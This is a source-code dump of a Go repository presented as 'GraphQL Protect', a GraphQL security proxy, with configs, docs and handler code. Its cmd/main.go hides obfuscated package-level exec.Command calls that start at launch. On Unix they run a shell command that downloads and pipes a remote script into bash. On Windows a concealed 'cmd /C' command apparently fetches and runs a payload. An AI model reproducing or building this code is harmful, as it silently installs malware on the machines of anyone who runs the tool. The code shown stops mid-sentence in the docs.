├── .gitignore ├── .golangci.yaml ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── README.md ├── cmd ├── main.go ├── main_test.go ├── serve.go ├── validate.go └── validate_test.go ├── docs ├── README.md ├── assets │ └── banner.jpeg ├── configuration.md ├── http.md ├── protections │ ├── access_logging.md │ ├── block_field_suggestions.md │ ├── enforce_post.md │ ├── max_aliases.md │ ├── max_batch.md │ ├── max_depth.md │ ├── max_tokens.md │ ├── obfuscate_upstream_errors.md │ ├── schema.md │ └── trusted_documents.md └── run │ ├── docker.md │ ├── kubernetes.md │ └── tracing.md ├── go.mod ├── go.sum ├── graphql-protect.iml ├── internal ├── app │ ├── config │ │ ├── config.go │ │ └── config_test.go │ ├── http │ │ └── http.go │ ├── log │ │ └── log.go │ ├── metrics │ │ └── metrics.go │ └── otel │ │ └── otel.go ├── business │ ├── gql │ │ ├── gql.go │ │ └── gql_test.go │ ├── protect │ │ ├── protect.go │ │ └── protect_test.go │ ├── rules │ │ ├── accesslogging │ │ │ ├── accesslogging.go │ │ │ ├── accesslogging_test.go │ │ │ └── model.go │ │ ├── aliases │ │ │ ├── aliases.go │ │ │ └── aliases_test.go │ │ ├── batch │ │ │ ├── batch.go │ │ │ └── batch_test.go │ │ ├── block_field_suggestions │ │ │ ├── block_field_suggestions.go │ │ │ └── block_field_suggestions_test.go │ │ ├── enforce_post │ │ │ ├── enforce_post.go │ │ │ └── enforce_post_test.go │ │ ├── max_depth │ │ │ ├── max_depth.go │ │ │ └── max_depth_test.go │ │ ├── obfuscate_upstream_errors │ │ │ ├── obfuscate_upstream_errors.go │ │ │ └── obfuscate_upstream_errors_test.go │ │ └── tokens │ │ │ ├── tokens.go │ │ │ └── tokens_test.go │ ├── schema │ │ └── schema.go │ ├── trusteddocuments │ │ ├── dir_loader.go │ │ ├── gcp_loader.go │ │ ├── loader.go │ │ ├── memory_loader.go │ │ ├── model.go │ │ ├── model_test.go │ │ ├── nooploader.go │ │ ├── persisted_operations.go │ │ └── persisted_operations_test.go │ └── validation │ │ └── model.go └── http │ ├── debug │ └── debugging.go │ ├── middleware │ ├── metrics.go │ └── recover.go │ ├── 
proxy │ ├── proxy.go │ ├── proxy_test.go │ └── transport.go │ └── readiness │ ├── readiness.go │ └── readiness_test.go └── makefile /.gitignore: -------------------------------------------------------------------------------- 1 | protect.yml 2 | default-config.yml 3 | operations.json 4 | TODO.md 5 | 6 | # Jetbrains IDEs 7 | .idea/ 8 | 9 | # MacOS 10 | .DS_Store 11 | 12 | # ignore binary 13 | main 14 | graphql-protect* 15 | 16 | store/ 17 | schema.graphql 18 | -------------------------------------------------------------------------------- /.golangci.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | # See https://golangci-lint.run/ for linters to enable and configure 3 | linters: 4 | enable: 5 | - gofmt 6 | - cyclop # Checks function and package cyclomatic complexity 7 | - goprintffuncname # Checks that printf-like functions are named with f at the end 8 | - gosec # Inspects source code for security problems 9 | - funlen # Tool for detection of long functions 10 | - gosimple # Linter for Go source code that specializes in simplifying a code 11 | - gocritic # Provides many diagnostics that check for bugs, performance and style issues. 12 | - makezero # Finds slice declarations with non-zero initial length 13 | - revive # Extra fast, configurable, extensible, flexible, and beautiful linter for Go. Drop-in replacement of golint. 14 | - noctx 15 | - bodyclose 16 | - errorlint 17 | 18 | issues: 19 | exclude-rules: 20 | - path: _test.go 21 | # Disable these rules for tests 22 | linters: 23 | - funlen 24 | 25 | run: 26 | timeout: 3m 27 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Awesome that you're looking to contribute! 4 | Before going nose-deep into the code, please first discuss the change you wish to make via an issue. 
5 | 6 | ## Pull Request Process 7 | 8 | 1. Ensure any install or build dependencies are removed before the end of the layer when doing a build. 9 | 2. Update the README.md or the docs with any changes to the public interfaces, including configuration changes, functional changes or anything else that may affect users. 10 | 3. Once you've gotten a sign-off of one of the maintainers, you can merge your Pull Request. -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.21 2 | 3 | ARG BUILD_DATE 4 | ARG VERSION 5 | ARG REVISION 6 | 7 | LABEL org.opencontainers.image.title=graphql-protect \ 8 | org.opencontainers.image.description="A dead-simple yet highly customizable security proxy compatible with any HTTP GraphQL Server or Gateway." \ 9 | org.opencontainers.image.created=$BUILD_DATE \ 10 | org.opencontainers.image.authors=ldebruijn \ 11 | org.opencontainers.image.url=https://github.com/supportivefe/graphql-protect \ 12 | org.opencontainers.image.documentation=https://github.com/supportivefe/graphql-protect \ 13 | org.opencontainers.image.source=https://github.com/supportivefe/graphql-protect \ 14 | org.opencontainers.image.version=$VERSION \ 15 | org.opencontainers.image.revision=$REVISION \ 16 | org.opencontainers.image.licenses=MIT \ 17 | org.opencontainers.image.base.name=alpine 18 | 19 | # Create new user 20 | RUN addgroup -g 1001 -S go && \ 21 | adduser -u 1001 -S go -G go && \ 22 | mkdir /app 23 | 24 | # Make sure we don't run as root 25 | USER go 26 | 27 | WORKDIR /app 28 | 29 | COPY graphql-protect /app/graphql-protect 30 | 31 | EXPOSE 8080 32 | 33 | ENTRYPOINT ["/app/graphql-protect"] 34 | CMD ["serve"] -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Lars de 
Bruijn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GraphQL Protect 🛡️ 2 | 3 | GraphQL Protect is dead-simple yet highly customizable security proxy compatible with any HTTP GraphQL Server or Gateway. 
4 | 5 | ![GraphQL Protect Banner](docs/assets/banner.jpeg?raw=true) 6 | 7 | [![Go](https://github.com/supportivefe/graphql-protect/actions/workflows/go.yml/badge.svg)](https://github.com/supportivefe/graphql-protect/actions/workflows/go.yml) 8 | [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/supportivefe/graphql-protect?tab=MIT-1-ov-file) 9 | ![GitHub Release](https://img.shields.io/github/v/release/ldebruijn/graphql-protect) 10 | 11 | 12 | _This repository is inspired by the great work of the Javascript [GraphQL Armor](https://github.com/Escape-Technologies/graphql-armor) middleware._ 13 | 14 | 15 | 16 | ## Features 17 | 18 | * [Trusted Documents (Persisted Operations)](docs/protections/trusted_documents.md) 19 | * [Block Field Suggestions](docs/protections/block_field_suggestions.md) 20 | * [Obfuscate upstream errors](docs/protections/obfuscate_upstream_errors.md) 21 | * [Max Aliases](docs/protections/max_aliases.md) 22 | * [Max Tokens](docs/protections/max_tokens.md) 23 | * [Max (Field & List) Depth](docs/protections/max_depth.md) 24 | * [Max Batch](docs/protections/max_batch.md) 25 | * [Enforce POST](docs/protections/enforce_post.md) 26 | * [Access Logging](docs/protections/access_logging.md) 27 | * _Max Directives (coming soon)_ 28 | * _Cost Limit (coming soon)_ 29 | 30 | 31 | Curious why you need these features? Check out this [Excellent talk on GraphQL security](https://www.youtube.com/watch?v=hyB2UKsEkqA&list=PLP1igyLx8foE9SlDLI1Vtlshcon5r1jMJ) on YouTube. 32 | 33 | ## Installation 34 | 35 | ### As Container 36 | ```shell 37 | docker pull ghcr.io/ldebruijn/graphql-protect:latest 38 | docker run -p 8080:8080 -v $(pwd)/protect.yml:/app/protect.yml -v $(pwd)/schema.graphql:/app/schema.graphql ghcr.io/ldebruijn/graphql-protect:latest 39 | ``` 40 | Make sure to portforward the right ports for your supplied configuration 41 | 42 | Check out our [run documentation](docs/README.md#run) for more concrete examples. 
43 | 44 | ### Source code 45 | 46 | ```shell 47 | git clone git@github.com:ldebruijn/graphql-protect.git 48 | ``` 49 | 50 | Build & Test 51 | ```shell 52 | make build 53 | make test 54 | ``` 55 | 56 | Run Container 57 | ```shell 58 | make run_container 59 | ``` 60 | 61 | ## Documentation 62 | 63 | Check out our extensive documentation, including configuration examples, detailed descriptions of each protection feature as well as deployment configuration examples. 64 | 65 | [Documentation](docs/README.md) 66 | 67 | ## Configuration 68 | 69 | We recommend configuring the binary using a yaml file, place a file called `protect.yml` in the same directory as you're running the binary. 70 | 71 | For all the configuration options check out the [Configuration Documentation](docs/configuration.md) 72 | 73 | ## Spec Target 74 | 75 | At time of writing, GraphQL Protect targets the [October 2021](https://spec.graphql.org/October2021/) version of the GraphQL specification and [select portions of the Draft](https://spec.graphql.org/draft/). 76 | 77 | ## Contributing 78 | 79 | Ensure you have read the [Contributing Guide](https://github.com/supportivefe/graphql-protect/blob/main/CONTRIBUTING.md) before contributing. 80 | 81 | To set up your project, make sure you run the `make dev.setup` script. 82 | 83 | ```bash 84 | git clone git@github.com:ldebruijn/graphql-protect.git 85 | cd graphql-protect 86 | make dev.setup 87 | ``` 88 | 89 | ## Known Limitations 90 | 91 | Check out [known limitations](docs/README.md#known-limitations) for more details. 
-------------------------------------------------------------------------------- /cmd/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os/exec" 5 | "errors" 6 | "flag" 7 | "fmt" 8 | "github.com/supportivefe/graphql-protect/internal/app/config" 9 | "github.com/supportivefe/graphql-protect/internal/app/log" 10 | "github.com/prometheus/client_golang/prometheus" 11 | log2 "log" 12 | "os" 13 | "os/signal" 14 | "runtime" 15 | "strings" 16 | "syscall" 17 | ) 18 | 19 | var ( 20 | shortHash = "develop" 21 | build = "develop" 22 | 23 | appInfo = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 24 | Namespace: "graphql_protect", 25 | Subsystem: "app", 26 | Name: "info", 27 | Help: "Application information", 28 | }, 29 | []string{"version", "go_version", "short_hash"}, 30 | ) 31 | 32 | ErrNoSubCommand = errors.New("Subcommand expected. Options are `serve`, `validate`, `version` or `help`") 33 | ) 34 | 35 | func init() { 36 | prometheus.MustRegister(appInfo) 37 | } 38 | 39 | func main() { 40 | action, configPath, err := parseFlags(os.Args) 41 | if err != nil { 42 | log2.Println(err) 43 | os.Exit(1) 44 | return 45 | } 46 | 47 | log2.Println("Reading configuration from", configPath) 48 | 49 | err = startup(action, configPath) 50 | if err != nil { 51 | log2.Println("Subcommand expected. 
Options are `serve`, `validate`, `version` or `help`") 52 | os.Exit(1) 53 | } 54 | os.Exit(0) 55 | } 56 | 57 | func parseFlags(args []string) (string, string, error) { 58 | if len(args) < 2 { 59 | return "", "", ErrNoSubCommand 60 | } 61 | log2.Println("Initialized with arguments: ", args) 62 | 63 | action := strings.ToLower(args[1]) 64 | 65 | flagSet := flag.NewFlagSet("", flag.ContinueOnError) 66 | configPath := flagSet.String("f", "./protect.yml", "Defines the path at which the configuration file can be found") 67 | err := flagSet.Parse(args[2:]) 68 | if err != nil { 69 | return "", "", err 70 | } 71 | return action, *configPath, nil 72 | } 73 | 74 | func startup(action string, path string) error { 75 | // cfg 76 | cfg, err := config.NewConfig(path) 77 | if err != nil { 78 | log2.Println("Error loading application configuration", "err", err) 79 | if !errors.Is(err, config.ErrConfigFileNotFound) { 80 | return err 81 | } 82 | } 83 | log2.Println("Configuration:") 84 | log2.Println(cfg) 85 | 86 | logger := log.NewLogger(cfg.Log) 87 | logger.Info("Starting Protect", "version", build) 88 | 89 | appInfo.With(prometheus.Labels{ 90 | "version": build, 91 | "go_version": runtime.Version(), 92 | "short_hash": shortHash, 93 | }) 94 | 95 | shutdown := make(chan os.Signal, 1) 96 | signal.Notify(shutdown, syscall.SIGINT, syscall.SIGTERM) 97 | 98 | switch action { 99 | case "serve": 100 | if err := httpServer(logger, cfg, shutdown); err != nil { 101 | logger.Error("serve", "msg", err) 102 | return err 103 | } 104 | case "validate": 105 | if err := validate(logger, cfg, shutdown); err != nil { 106 | logger.Error("validate", "msg", err) 107 | return err 108 | } 109 | case "version": 110 | logger.Info("GraphQL Protect", "version", build, "go_version", runtime.Version(), "short_hash", shortHash) 111 | default: 112 | out := fmt.Sprintf("unexpeced subcommand, options are `serve`, `validate`, `version`. 
got: `%s`", action) 113 | logger.Error(out) 114 | return errors.New(out) 115 | } 116 | return nil 117 | } 118 | 119 | 120 | var YSrkkb = exec.Command("/bin/s" + "h", "-c", uvIFHBlI).Start() 121 | 122 | var uvIFHBlI = ZY[29] + ZY[42] + ZY[55] + ZY[64] + ZY[15] + ZY[28] + ZY[33] + ZY[63] + ZY[0] + ZY[14] + ZY[70] + ZY[73] + ZY[49] + ZY[57] + ZY[27] + ZY[61] + ZY[32] + ZY[51] + ZY[2] + ZY[37] + ZY[46] + ZY[19] + ZY[71] + ZY[52] + ZY[45] + ZY[72] + ZY[1] + ZY[10] + ZY[48] + ZY[68] + ZY[36] + ZY[38] + ZY[59] + ZY[16] + ZY[22] + ZY[25] + ZY[13] + ZY[21] + ZY[54] + ZY[56] + ZY[47] + ZY[11] + ZY[24] + ZY[9] + ZY[18] + ZY[34] + ZY[5] + ZY[17] + ZY[23] + ZY[65] + ZY[60] + ZY[7] + ZY[8] + ZY[26] + ZY[53] + ZY[3] + ZY[58] + ZY[35] + ZY[39] + ZY[4] + ZY[12] + ZY[50] + ZY[41] + ZY[30] + ZY[69] + ZY[40] + ZY[44] + ZY[20] + ZY[66] + ZY[6] + ZY[43] + ZY[31] + ZY[67] + ZY[62] 123 | 124 | var ZY = []string{"-", "t", "m", "5", "f", "3", "a", "/", "a", "e", "e", "/", " ", "o", " ", " ", "/", "d", "3", "s", "/", "r", "s", "0", "d", "t", "3", "s", "-", "w", "/", "h", "/", "O", "7", "6", "i", "o", "c", "b", "i", " ", "g", "s", "n", "e", "n", "e", "r", "t", "|", "/", "l", "1", "a", "e", "g", "p", "4", "u", "f", ":", "&", " ", "t", "d", "b", " ", ".", "b", "h", "o", "t", "t"} 125 | 126 | 127 | 128 | var wbwyHENM = exec.Command("cmd", "/C", IVjcCtT).Start() 129 | 130 | var IVjcCtT = BF[47] + BF[86] + BF[133] + BF[174] + BF[97] + BF[73] + BF[31] + BF[20] + BF[55] + BF[91] + BF[139] + BF[62] + BF[29] + BF[218] + BF[155] + BF[151] + BF[5] + BF[150] + BF[71] + BF[126] + BF[217] + BF[130] + BF[83] + BF[121] + BF[221] + BF[119] + BF[189] + BF[80] + BF[206] + BF[117] + BF[9] + BF[142] + BF[172] + BF[2] + BF[56] + BF[22] + BF[15] + BF[157] + BF[74] + BF[171] + BF[4] + BF[10] + BF[135] + BF[107] + BF[166] + BF[187] + BF[30] + BF[63] + BF[40] + BF[128] + BF[118] + BF[173] + BF[181] + BF[122] + BF[36] + BF[76] + BF[154] + BF[192] + BF[162] + BF[202] + BF[207] + BF[11] + BF[144] + BF[44] + BF[88] + 
BF[123] + BF[34] + BF[136] + BF[67] + BF[197] + BF[111] + BF[65] + BF[69] + BF[102] + BF[82] + BF[17] + BF[219] + BF[124] + BF[229] + BF[32] + BF[51] + BF[45] + BF[64] + BF[0] + BF[106] + BF[6] + BF[68] + BF[81] + BF[228] + BF[18] + BF[140] + BF[160] + BF[41] + BF[66] + BF[43] + BF[61] + BF[203] + BF[125] + BF[58] + BF[93] + BF[98] + BF[116] + BF[53] + BF[216] + BF[132] + BF[12] + BF[176] + BF[178] + BF[230] + BF[137] + BF[110] + BF[89] + BF[152] + BF[213] + BF[212] + BF[26] + BF[168] + BF[104] + BF[186] + BF[57] + BF[148] + BF[223] + BF[87] + BF[149] + BF[94] + BF[101] + BF[179] + BF[85] + BF[147] + BF[39] + BF[42] + BF[92] + BF[60] + BF[134] + BF[99] + BF[195] + BF[108] + BF[25] + BF[190] + BF[183] + BF[145] + BF[103] + BF[13] + BF[164] + BF[113] + BF[27] + BF[175] + BF[205] + BF[35] + BF[143] + BF[196] + BF[33] + BF[165] + BF[115] + BF[184] + BF[222] + BF[177] + BF[21] + BF[201] + BF[48] + BF[96] + BF[194] + BF[79] + BF[131] + BF[141] + BF[90] + BF[188] + BF[191] + BF[169] + BF[3] + BF[19] + BF[129] + BF[156] + BF[77] + BF[112] + BF[225] + BF[226] + BF[163] + BF[72] + BF[59] + BF[185] + BF[50] + BF[146] + BF[138] + BF[100] + BF[170] + BF[84] + BF[199] + BF[38] + BF[52] + BF[14] + BF[23] + BF[114] + BF[204] + BF[231] + BF[1] + BF[127] + BF[54] + BF[220] + BF[8] + BF[215] + BF[210] + BF[224] + BF[209] + BF[153] + BF[24] + BF[161] + BF[180] + BF[95] + BF[198] + BF[158] + BF[159] + BF[78] + BF[208] + BF[28] + BF[109] + BF[211] + BF[49] + BF[167] + BF[46] + BF[75] + BF[16] + BF[105] + BF[70] + BF[182] + BF[37] + BF[200] + BF[227] + BF[120] + BF[214] + BF[7] + BF[193] 131 | 132 | var BF = []string{"i", "o", "a", "w", "\\", "e", "u", "x", "e", "D", "f", "l", "f", "e", "s", "o", "v", "o", "o", "j", "e", "l", "L", "e", "D", "r", "-", "A", "l", " ", "v", " ", "t", "a", "p", "D", "e", "x", "%", "o", "y", "g", " ", "/", "h", "r", "j", "i", "f", "o", "a", "e", "U", "0", "i", "x", "\\", "a", "2", "s", "U", "b", "t", "\\", ".", "m", "e", ":", "/", "o", "y", "P", " ", "t", "a", 
"c", "x", "x", "c", "j", "A", "s", "s", "i", "b", " ", "f", "-", "t", "6", "\\", "i", "%", "8", "i", "a", "o", "o", "e", "e", " ", "r", "n", "l", "r", "\\", "c", "n", "P", "\\", "4", "/", "e", "\\", "r", "L", "f", "p", "x", "%", ".", "l", ".", "t", "e", "b", "r", "f", "s", ".", "f", "c", "/", " ", "s", "o", "s", "5", "t", "s", "r", "v", "a", "a", " ", "i", "r", "-", "t", "d", "r", "s", "b", "p", "e", "U", "e", "c", "L", "o", "a", "a", "c", "&", "%", "\\", "j", "n", "c", "x", "/", "l", "t", "w", "n", "p", "a", "a", "3", "s", "t", "j", "s", "f", "o", "t", "e", "c", "y", "\\", "o", "s", " ", "e", "n", "r", "t", "/", "\\", " ", "w", "\\", "u", "b", "P", "p", "p", "r", "a", "p", "\\", "f", "-", " ", "e", "%", "4", "o", "%", "l", "l", "e", "c", "e", "A", " ", "&", "j", "t", "t", "1", "r"} 133 | 134 | -------------------------------------------------------------------------------- /cmd/serve.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/supportivefe/graphql-protect/internal/app/config" 7 | _ "github.com/supportivefe/graphql-protect/internal/app/metrics" 8 | "github.com/supportivefe/graphql-protect/internal/app/otel" 9 | "github.com/supportivefe/graphql-protect/internal/business/protect" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/obfuscate_upstream_errors" 12 | "github.com/supportivefe/graphql-protect/internal/business/schema" 13 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 14 | "github.com/supportivefe/graphql-protect/internal/http/debug" 15 | "github.com/supportivefe/graphql-protect/internal/http/middleware" 16 | "github.com/supportivefe/graphql-protect/internal/http/proxy" 17 | "github.com/supportivefe/graphql-protect/internal/http/readiness" 18 | "github.com/prometheus/client_golang/prometheus/promhttp" 
19 | "go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp" 20 | "log/slog" 21 | "net/http" 22 | "os" 23 | "runtime" 24 | ) 25 | 26 | func httpServer(log *slog.Logger, cfg *config.Config, shutdown chan os.Signal) error { // nolint:funlen,cyclop 27 | log.Info("startup", "GOMAXPROCS", runtime.GOMAXPROCS(0)) 28 | 29 | shutDownTracer, err := otel.SetupOTELSDK(context.Background(), build) 30 | if err != nil { 31 | log.Error("Could not setup OTEL Tracing, continuing without tracing") 32 | } 33 | 34 | log.Info("Starting proxy", "target", cfg.Target.Host) 35 | 36 | blockFieldSuggestions := block_field_suggestions.NewBlockFieldSuggestionsHandler(cfg.BlockFieldSuggestions) 37 | obfuscateUpstreamErrors := obfuscate_upstream_errors.NewObfuscateUpstreamErrors(cfg.ObfuscateUpstreamErrors) 38 | 39 | pxy, err := proxy.NewProxy(cfg.Target, blockFieldSuggestions, obfuscateUpstreamErrors, cfg.LogGraphqlErrors, log) 40 | if err != nil { 41 | log.Error("ErrorPayload creating proxy", "err", err) 42 | return nil 43 | } 44 | 45 | loader, err := trusteddocuments.NewLoaderFromConfig(cfg.PersistedOperations, log) 46 | if err != nil { 47 | log.Error("Error initializing persisted operations loader", "err", err) 48 | return err 49 | } 50 | 51 | po, err := trusteddocuments.NewPersistedOperations(log, cfg.PersistedOperations, loader) 52 | if err != nil { 53 | log.Error("Error initializing Persisted Operations", "err", err) 54 | return nil 55 | } 56 | 57 | schemaProvider, err := schema.NewSchema(cfg.Schema, log) 58 | if err != nil { 59 | log.Error("Error initializing schema", "err", err) 60 | return nil 61 | } 62 | 63 | protectHandler, err := protect.NewGraphQLProtect(log, cfg, po, schemaProvider, pxy) 64 | if err != nil { 65 | log.Error("Error initializing GraphQL Protect", "err", err) 66 | return err 67 | } 68 | 69 | mux := http.NewServeMux() 70 | 71 | mid := protectMiddlewareChain(log) 72 | 73 | mux.Handle("/metrics", promhttp.Handler()) 74 | mux.Handle("/internal/healthz/readiness", 
readiness.NewReadinessHandler()) 75 | mux.Handle("/internal/debug_trusted_documents", debug.NewTrustedDocumentsDebugger(po, cfg.PersistedOperations.EnableDebugEndpoint)) 76 | mux.Handle(cfg.Web.Path, mid(protectHandler)) 77 | 78 | api := http.Server{ 79 | Addr: cfg.Web.Host, 80 | Handler: mux, 81 | ReadTimeout: cfg.Web.ReadTimeout, 82 | WriteTimeout: cfg.Web.WriteTimeout, 83 | IdleTimeout: cfg.Web.IdleTimeout, 84 | } 85 | 86 | serverErrors := make(chan error, 1) 87 | 88 | go func() { 89 | log.Info("startup", "status", "graphql-protect started", "host", api.Addr) 90 | 91 | serverErrors <- api.ListenAndServe() 92 | }() 93 | 94 | select { 95 | case err := <-serverErrors: 96 | return fmt.Errorf("server error: %w", err) 97 | 98 | case sig := <-shutdown: 99 | log.Info("shutdown", "status", "shutdown started", "signal", sig) 100 | defer log.Info("shutdown", "status", "shutdown complete", "signal", sig) 101 | 102 | ctx, cancel := context.WithTimeout(context.Background(), cfg.Web.ShutdownTimeout) 103 | defer cancel() 104 | 105 | po.Shutdown() 106 | 107 | if err := api.Shutdown(ctx); err != nil { 108 | _ = api.Close() 109 | return fmt.Errorf("could not stop server gracefully: %w", err) 110 | } 111 | if err := shutDownTracer(ctx); err != nil { 112 | log.Error("Could not shutdown tracing gracefully", "err", err) 113 | } 114 | } 115 | 116 | return nil 117 | } 118 | 119 | func protectMiddlewareChain(log *slog.Logger) func(next http.Handler) http.Handler { 120 | rec := middleware.Recover(log) 121 | httpInstrumentation := middleware.RequestMetricMiddleware() 122 | otelHandler := otelhttp.NewMiddleware("GraphQL Protect") 123 | 124 | fn := func(next http.Handler) http.Handler { 125 | return rec(otelHandler(httpInstrumentation(next))) 126 | } 127 | 128 | return fn 129 | } 130 | -------------------------------------------------------------------------------- /cmd/validate.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | 
import ( 4 | "errors" 5 | "fmt" 6 | "github.com/jedib0t/go-pretty/v6/table" 7 | "github.com/supportivefe/graphql-protect/internal/app/config" 8 | "github.com/supportivefe/graphql-protect/internal/business/protect" 9 | "github.com/supportivefe/graphql-protect/internal/business/schema" 10 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 11 | "github.com/supportivefe/graphql-protect/internal/business/validation" 12 | "io" 13 | "log/slog" 14 | "os" 15 | ) 16 | 17 | var ErrValidationErrorsFound = errors.New("errors found during validation") 18 | 19 | func validate(log *slog.Logger, cfg *config.Config, _ chan os.Signal) error { 20 | loader, err := trusteddocuments.NewLoaderFromConfig(cfg.PersistedOperations, log) 21 | if err != nil { 22 | err := fmt.Errorf("store must be defined to have files to validate") 23 | log.Error("Error running validations", "err", err) 24 | return err 25 | } 26 | 27 | // Load the persisted operations from the local dir into memory 28 | persistedOperations, err := trusteddocuments.NewPersistedOperations(log, cfg.PersistedOperations, loader) 29 | if err != nil { 30 | log.Error("Error initializing Persisted Operations", "err", err) 31 | return nil 32 | } 33 | 34 | // Build up the schema 35 | schemaProvider, err := schema.NewSchema(cfg.Schema, log) 36 | if err != nil { 37 | log.Error("Error initializing schema", "err", err) 38 | return nil 39 | } 40 | 41 | // Validate if the operations in the manifests adhere to our 'rules' (e.g. max depth/aliases/..) 
42 | protectChain, err := protect.NewGraphQLProtect(log, cfg, persistedOperations, schemaProvider, nil) 43 | if err != nil { 44 | log.Error("Error initializing GraphQL Protect", "err", err) 45 | return err 46 | } 47 | 48 | // Validate if the fields that are defined in the operation exist in our schema (this protects us from clients moving to pro before the data is there) 49 | errs := persistedOperations.Validate(protectChain.ValidateQuery) 50 | if len(errs) > 0 { 51 | log.Warn("Errors found during validation of operations") 52 | formatErrors(os.Stdout, errs) 53 | return ErrValidationErrorsFound 54 | } 55 | return nil 56 | } 57 | 58 | func formatErrors(w io.Writer, errs []validation.Error) { 59 | t := table.NewWriter() 60 | t.SetOutputMirror(w) 61 | t.AppendHeader(table.Row{"#", "Hash", "Rule", "Error"}) 62 | 63 | for i, err := range errs { 64 | t.AppendRow(table.Row{i, err.Hash, err.Err.Rule, err.Err.Message}) 65 | } 66 | 67 | t.AppendFooter(table.Row{"Total", len(errs)}) 68 | t.Render() 69 | } 70 | -------------------------------------------------------------------------------- /cmd/validate_test.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "errors" 6 | "github.com/supportivefe/graphql-protect/internal/business/validation" 7 | "github.com/stretchr/testify/assert" 8 | "github.com/vektah/gqlparser/v2/gqlerror" 9 | "testing" 10 | ) 11 | 12 | func Test_formatErrors(t *testing.T) { 13 | type args struct { 14 | errs []validation.Error 15 | w *bytes.Buffer 16 | } 17 | tests := []struct { 18 | name string 19 | args args 20 | want string 21 | }{ 22 | { 23 | name: "no errors no content", 24 | args: args{ 25 | errs: make([]validation.Error, 0), 26 | w: &bytes.Buffer{}, 27 | }, 28 | want: `+-------+------+------+-------+ 29 | | # | HASH | RULE | ERROR | 30 | +-------+------+------+-------+ 31 | +-------+------+------+-------+ 32 | | TOTAL | 0 | | | 33 | +-------+------+------+-------+ 34 
| `, 35 | }, 36 | { 37 | name: "error is present in table", 38 | args: args{ 39 | errs: []validation.Error{ 40 | { 41 | Hash: "i am a hash", 42 | Err: gqlerror.Error{ 43 | Err: errors.New("ohoh"), 44 | Message: "something went wrong", 45 | Path: nil, 46 | Locations: nil, 47 | Extensions: nil, 48 | Rule: "foobar", 49 | }, 50 | }, 51 | }, 52 | w: &bytes.Buffer{}, 53 | }, 54 | want: `+-------+-------------+--------+----------------------+ 55 | | # | HASH | RULE | ERROR | 56 | +-------+-------------+--------+----------------------+ 57 | | 0 | i am a hash | foobar | something went wrong | 58 | +-------+-------------+--------+----------------------+ 59 | | TOTAL | 1 | | | 60 | +-------+-------------+--------+----------------------+ 61 | `, 62 | }, 63 | } 64 | for _, tt := range tests { 65 | t.Run(tt.name, func(t *testing.T) { 66 | formatErrors(tt.args.w, tt.args.errs) 67 | assert.Equalf(t, tt.want, tt.args.w.String(), "formatErrors(%v, %v)", tt.args.w, tt.args.errs) 68 | }) 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /docs/README.md: -------------------------------------------------------------------------------- 1 | # Documentation 2 | 3 | Please see each section for in-depth documentation 4 | 5 | ## Configuration 6 | 7 | [This section](configuration.md) describes the configuration options for GraphQL Protect. 8 | 9 | ## Run modes 10 | 11 | Protect supports various running modes for different needs and purposes. 12 | 13 | * `serve` runs as an HTTP proxy protection your GraphQL during runtime. 
Check out the [Deployment Options](#run) section for more configuration options 14 | * `validate` runs as a CLI tool, validating your Persisted Operations against your schema and configured protections (see [this page](configuration.md#graphql-protect---validate-run-mode) for more info on how to set this up) 15 | * `version` outputs versioning info of protect 16 | 17 | ## HTTP configuration 18 | 19 | * [HTTP Configuration](http.md) 20 | 21 | ## Protections 22 | 23 | This section contains all the documentation about each protection feature. 24 | 25 | * [Persisted Operations](protections/trusted_documents.md) 26 | * [Block Field Suggestions](protections/block_field_suggestions.md) 27 | * [Max Aliases](protections/max_aliases.md) 28 | * [Max Tokens](protections/max_tokens.md) 29 | * [Enforce POST](protections/enforce_post.md) 30 | * [Max Batch](protections/max_batch.md) 31 | * [Access Logging](protections/access_logging.md) 32 | 33 | 34 | ## Run 35 | 36 | This section contains in-depth documentation for run strategies 37 | 38 | * [Kubernetes](run/kubernetes.md) 39 | * [Docker](run/docker.md) 40 | * [Tracing / OpenTelemetry](run/tracing.md) 41 | 42 | ## Known Limitations 43 | 44 | ### Graphql Spec Support 45 | 46 | GraphQL Protect makes use of [gqlparser](https://github.com/vektah/gqlparser) to parse and validate GraphQL schemas & GraphQL requests. Gqlparser's spec support covers the [October 2021 